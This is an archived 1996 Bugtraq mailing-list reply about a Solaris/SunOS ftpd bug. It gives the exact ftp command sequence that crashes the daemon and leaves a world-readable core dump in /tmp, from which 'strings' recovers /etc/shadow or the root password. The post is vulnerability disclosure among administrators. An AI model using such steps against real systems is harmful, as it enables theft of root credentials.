Bugtraq mailing list archives
Re: ftpd bug? Was: bin/1805: Bug in ftpd
From: poland () cam2 gsfc nasa gov (James Poland 6-5251)
Date: Wed, 16 Oct 1996 08:52:57 -0400
Martin's method works for Solaris 2.5.1 as well. 'strings' on the core file reveals the complete contents of /etc/shadow. This is not good. To reiterate, if someone else is running an ftp session on host_a, start your own ftp session with host_a. Then issue the commands ftp> cd /tmp ftp> user root wrongpasswd ftp> quote pasv Examine the resulting core file with the strings command. This method does not work with Solaris 2.4.
James Poland 6-5251 wrote:On Solaris 2.5.1, the core file contains only the user's password in cleartext. How hard is it to crash someone else's ftp session?Killing from the command line doesn't seem to work, but: SunOS 5.5: logon via ftp with your regular user/password, ftp> cd /tmp ftp> user root wrongpasswd ftp> quote pasv voila, root password in world readable core dump under /tmp -Martin PS: Sun's ftpd doesn't core when issuing "quote pasv" before logon, so the seem to have used the proposed fix Checking for "pw != NULL" So this proposal was simple and obvious ... and incomplete. :)
Current thread:
- Re: ftpd bug? Was: bin/1805: Bug in ftpd, (continued)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd Doug Williams (Oct 16)
- solaris 2.4 license-manager bug Grant Kaufmann (Oct 16)
- Re: BoS: solaris 2.4 license-manager bug Paul Wickman (Oct 17)
- fix for symlinks in /tmp Andrew Tridgell (Oct 18)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd gamble () dxcoms cern ch (Oct 16)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd Andrew Dills (Oct 16)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd Jonny Llama (Oct 16)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd Perry E. Metzger (Oct 16)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd Andrew Dills (Oct 16)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd Rune Braathen (Oct 16)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd Grant Kaufmann (Oct 16)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd James Poland 6-5251 (Oct 16)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd Martin Rex (Oct 17)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd Brad.Powell (Oct 17)